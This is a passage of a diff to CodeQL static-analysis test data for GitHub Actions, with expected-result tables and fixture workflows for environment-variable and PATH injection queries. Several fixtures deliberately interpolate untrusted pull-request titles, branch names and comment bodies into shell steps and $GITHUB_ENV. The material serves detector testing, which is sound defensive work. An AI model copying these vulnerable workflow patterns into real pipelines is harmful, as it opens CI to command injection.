Run Step | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | | .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | | .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | | .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | | .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | | .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | | .github/workflows/multiline.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | @@ -335,11 +360,14 @@ dfNodes | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | argumentNodes | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | @@ -349,28 +377,39 @@ usesIds nodeLocations | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:5:5:21:47 | .github/workflows/expression_nodes.yml@5:5:21:47 | | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:9:8:6 | .github/workflows/expression_nodes.yml@7:9:8:6 | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:7:14:7:58 | .github/workflows/expression_nodes.yml@7:14:7:58 | | .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:27:7:58 | .github/workflows/expression_nodes.yml@7:27:7:58 | | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:9:10:6 | .github/workflows/expression_nodes.yml@8:9:10:6 | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:8:14:9:57 | .github/workflows/expression_nodes.yml@8:14:9:57 | | .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:9:25:9:56 | .github/workflows/expression_nodes.yml@9:25:9:56 | | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:9:13:6 | .github/workflows/expression_nodes.yml@10:9:13:6 | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:10:14:12:53 | .github/workflows/expression_nodes.yml@10:14:12:53 | | .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:11:25:11:56 | .github/workflows/expression_nodes.yml@11:25:11:56 | | .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:12:24:12:51 | .github/workflows/expression_nodes.yml@12:24:12:51 | | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:9:16:6 | .github/workflows/expression_nodes.yml@13:9:16:6 | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:13:14:15:46 | .github/workflows/expression_nodes.yml@13:14:15:46 | | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:9:20:6 | .github/workflows/expression_nodes.yml@16:9:20:6 | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:16:14:19:57 | .github/workflows/expression_nodes.yml@16:14:19:57 | | .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:17:25:17:56 | .github/workflows/expression_nodes.yml@17:25:17:56 | | .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:18:24:18:51 | .github/workflows/expression_nodes.yml@18:24:18:51 | | .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:19:24:19:55 | .github/workflows/expression_nodes.yml@19:24:19:55 | | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:9:21:47 | .github/workflows/expression_nodes.yml@20:9:21:47 | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | .github/workflows/multiline.yml:9:5:33:14 | .github/workflows/multiline.yml@9:5:33:14 | | .github/workflows/multiline.yml:11:9:15:6 | Run Step | .github/workflows/multiline.yml:11:9:15:6 | .github/workflows/multiline.yml@11:9:15:6 | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:14:14:48 | .github/workflows/multiline.yml@11:14:14:48 | | .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:9:20:6 | .github/workflows/multiline.yml@15:9:20:6 | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:15:14:19:40 | .github/workflows/multiline.yml@15:14:19:40 | | .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:9:24:6 | .github/workflows/multiline.yml@20:9:24:6 | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:20:14:23:40 | .github/workflows/multiline.yml@20:14:23:40 | | .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:9:30:6 | .github/workflows/multiline.yml@24:9:30:6 | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:24:14:29:29 | .github/workflows/multiline.yml@24:14:29:29 | | .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:30:9:33:14 | .github/workflows/multiline.yml@30:9:33:14 | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:14:33:14 | .github/workflows/multiline.yml@30:14:33:14 | | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:32:13:32:39 | .github/workflows/multiline.yml@32:13:32:39 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | @@ -380,64 +419,67 @@ nodeLocations | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:19:9:26:6 | .github/workflows/test.yml@19:9:26:6 | | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:20:23:64 | .github/workflows/test.yml@23:20:23:64 | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:9:28:6 | .github/workflows/test.yml@26:9:28:6 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:27:14:27:63 | .github/workflows/test.yml@27:14:27:63 | | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:20:27:64 | .github/workflows/test.yml@27:20:27:64 | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:9:31:2 | .github/workflows/test.yml@28:9:31:2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:29:14:29:54 | .github/workflows/test.yml@29:14:29:54 | | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:15:29:55 | .github/workflows/test.yml@29:15:29:55 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:32:5:40:53 | .github/workflows/test.yml@32:5:40:53 | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:9:40:53 | .github/workflows/test.yml@39:9:40:53 | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:40:14:40:52 | .github/workflows/test.yml@40:14:40:52 | | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:20:40:53 | .github/workflows/test.yml@40:20:40:53 | scopes | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/multiline.yml:1:1:33:14 | on: | | .github/workflows/test.yml:1:1:40:53 | on: push | sources -| ahmadnassri/action-changed-files | * | output.files | PR changed files | manual | -| ahmadnassri/action-changed-files | * | output.json | PR changed files | manual | -| amannn/action-semantic-pull-request | * | output.error_message | PR title | manual | -| cypress-io/github-action | * | env.GH_BRANCH | PR branch | manual | -| dawidd6/action-download-artifact | * | output.artifacts | Artifact details | manual | -| dorny/paths-filter | * | output.changes | PR changed files | manual | -| franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | PR body | manual | -| franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | PR title | manual | -| googlecloudplatform/magic-modules | * | output.changed-files | PR changed files | manual | -| jitterbit/get-changed-files | * | output.added | PR changed files | manual | -| jitterbit/get-changed-files | * | output.added_modified | PR changed files | manual | -| jitterbit/get-changed-files | * | output.all | PR changed files | manual | -| jitterbit/get-changed-files | * | output.deleted | PR changed files | manual | -| jitterbit/get-changed-files | * | output.modified | PR changed files | manual | -| jitterbit/get-changed-files | * | output.removed | PR changed files | manual | -| jitterbit/get-changed-files | * | output.renamed | PR changed files | manual | -| khan/pull-request-comment-trigger | * | output.comment_body | Comment body | manual | -| marocchino/on_artifact | * | output.* | Downloaded artifact | manual | -| puppeteer/puppeteer/.github/workflows/changed-packages.yml | * | output.changes | Changed files | manual | -| redhat-plumbers-in-action/download-artifact | * | output.* | Downloaded artifact | manual | -| tj-actions/branch-names | * | output.current_branch | PR current branch | manual | -| tj-actions/branch-names | * | output.head_ref_branch | PR head branch | manual | -| tj-actions/branch-names | * | output.ref_branch | Branch tirggering workflow run | manual | -| tj-actions/changed-files | * | output.added_files | PR changed files | manual | -| tj-actions/changed-files | * | output.all_changed_and_modified_files | PR changed files | manual | -| tj-actions/changed-files | * | output.all_changed_files | PR changed files | manual | -| tj-actions/changed-files | * | output.all_modified_files | PR changed files | manual | -| tj-actions/changed-files | * | output.all_old_new_renamed_files | PR changed files | manual | -| tj-actions/changed-files | * | output.changed_keys | PR changed files | manual | -| tj-actions/changed-files | * | output.copied_files | PR changed files | manual | -| tj-actions/changed-files | * | output.deleted_files | PR changed files | manual | -| tj-actions/changed-files | * | output.modified_files | PR changed files | manual | -| tj-actions/changed-files | * | output.modified_keys | PR changed files | manual | -| tj-actions/changed-files | * | output.other_changed_files | PR changed files | manual | -| tj-actions/changed-files | * | output.other_deleted_files | PR changed files | manual | -| tj-actions/changed-files | * | output.other_modified_files | PR changed files | manual | -| tj-actions/changed-files | * | output.renamed_files | PR changed files | manual | -| tj-actions/changed-files | * | output.type_changed_files | PR changed files | manual | -| tj-actions/changed-files | * | output.unknown_files | PR changed files | manual | -| tj-actions/changed-files | * | output.unmerged_files | PR changed files | manual | -| tj-actions/verify-changed-files | * | output.changed-files | PR changed files | manual | -| trilom/file-changes-action | * | output.files | PR changed files | manual | -| trilom/file-changes-action | * | output.files_added | PR changed files | manual | -| trilom/file-changes-action | * | output.files_modified | PR changed files | manual | -| trilom/file-changes-action | * | output.files_removed | PR changed files | manual | -| tzkhan/pr-update-action | * | output.headMatch | | manual | -| xt0rted/slash-command-action | * | output.command-arguments | | manual | +| ahmadnassri/action-changed-files | * | output.files | filename | manual | +| ahmadnassri/action-changed-files | * | output.json | json | manual | +| amannn/action-semantic-pull-request | * | output.error_message | text | manual | +| cypress-io/github-action | * | env.GH_BRANCH | branch | manual | +| dawidd6/action-download-artifact | * | output.artifacts | artifact | manual | +| dorny/paths-filter | * | output.changes | filename | manual | +| franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | text | manual | +| franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | title | manual | +| googlecloudplatform/magic-modules | * | output.changed-files | filename | manual | +| jitterbit/get-changed-files | * | output.added | filename | manual | +| jitterbit/get-changed-files | * | output.added_modified | filename | manual | +| jitterbit/get-changed-files | * | output.all | filename | manual | +| jitterbit/get-changed-files | * | output.deleted | filename | manual | +| jitterbit/get-changed-files | * | output.modified | filename | manual | +| jitterbit/get-changed-files | * | output.removed | filename | manual | +| jitterbit/get-changed-files | * | output.renamed | filename | manual | +| khan/pull-request-comment-trigger | * | output.comment_body | text | manual | +| marocchino/on_artifact | * | output.* | artifact | manual | +| puppeteer/puppeteer/.github/workflows/changed-packages.yml | * | output.changes | filename | manual | +| redhat-plumbers-in-action/download-artifact | * | output.* | artifact | manual | +| tj-actions/branch-names | * | output.current_branch | branch | manual | +| tj-actions/branch-names | * | output.head_ref_branch | branch | manual | +| tj-actions/branch-names | * | output.ref_branch | branch | manual | +| tj-actions/changed-files | * | output.added_files | filename | manual | +| tj-actions/changed-files | * | output.all_changed_and_modified_files | filename | manual | +| tj-actions/changed-files | * | output.all_changed_files | filename | manual | +| tj-actions/changed-files | * | output.all_modified_files | filename | manual | +| tj-actions/changed-files | * | output.all_old_new_renamed_files | filename | manual | +| tj-actions/changed-files | * | output.changed_keys | filename | manual | +| tj-actions/changed-files | * | output.copied_files | filename | manual | +| tj-actions/changed-files | * | output.deleted_files | filename | manual | +| tj-actions/changed-files | * | output.modified_files | filename | manual | +| tj-actions/changed-files | * | output.modified_keys | filename | manual | +| tj-actions/changed-files | * | output.other_changed_files | filename | manual | +| tj-actions/changed-files | * | output.other_deleted_files | filename | manual | +| tj-actions/changed-files | * | output.other_modified_files | filename | manual | +| tj-actions/changed-files | * | output.renamed_files | filename | manual | +| tj-actions/changed-files | * | output.type_changed_files | filename | manual | +| tj-actions/changed-files | * | output.unknown_files | filename | manual | +| tj-actions/changed-files | * | output.unmerged_files | filename | manual | +| tj-actions/verify-changed-files | * | output.changed-files | filename | manual | +| trilom/file-changes-action | * | output.files | filename | manual | +| trilom/file-changes-action | * | output.files_added | filename | manual | +| trilom/file-changes-action | * | output.files_modified | filename | manual | +| trilom/file-changes-action | * | output.files_removed | filename | manual | +| tzkhan/pr-update-action | * | output.headMatch | branch | manual | +| xt0rted/slash-command-action | * | output.command-arguments | text | manual | summaries | akhileshns/heroku-deploy | * | input.branch | output.status | taint | manual | | android-actions/setup-android | * | input.cmdline-tools-version | output.ANDROID_COMMANDLINE_TOOLS_VERSION | taint | manual | diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml index c3c94755efd..8ca103cbb6a 100644 --- a/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml @@ -9,5 +9,7 @@ jobs: steps: - name: Code Injection, do not report as ENV VAR INJ run: echo ISSUE_KEY=$(echo "${{ github.event.pull_request.title }}") >> $GITHUB_ENV + - name: Code Injection, do not report as ENV VAR INJ + run: echo ISSUE_KEY=$(echo "${{ github.event.pull_request.head.ref }}") >> $GITHUB_ENV diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml index 733b15fc956..5061f51db62 100644 --- a/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml @@ -45,5 +45,9 @@ jobs: cat <<-"EOF" >> "$GITHUB_ENV" echo "FOO=$TITLE" EOF + - env: + TITLE: ${{ github.event.pull_request.head.ref }} + run: | + echo "PR_TITLE=$TITLE" >> $GITHUB_ENV diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected index 56345ca896a..1cb0b78a29b 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected @@ -7,6 +7,7 @@ edges | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | +| .github/workflows/test4.yml:49:19:49:59 | github.event.pull_request.head.ref | .github/workflows/test4.yml:50:14:51:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | @@ -25,6 +26,8 @@ nodes | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | +| .github/workflows/test4.yml:49:19:49:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/test4.yml:50:14:51:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | semmle.label | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | subpaths diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.expected b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.expected index 2dfa8702d59..af4b70d3a60 100644 --- a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.expected @@ -22,5 +22,4 @@ subpaths | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | echo $PATHINJ >> $GITHUB_PATH | | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | echo ${PATHINJ} >> $GITHUB_PATH | | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | echo "$(cat foo/bar)" >> $GITHUB_PATH | -| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | echo "::add-path::$PATHINJ" | | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | echo "::add-path::$PATHINJ" | diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected index f88785c38e1..701cefe2b79 100644 --- a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected @@ -7,6 +7,7 @@ edges | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | +| .github/workflows/test4.yml:49:19:49:59 | github.event.pull_request.head.ref | .github/workflows/test4.yml:50:14:51:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | @@ -25,6 +26,8 @@ nodes | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | +| .github/workflows/test4.yml:49:19:49:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/test4.yml:50:14:51:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | semmle.label | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat 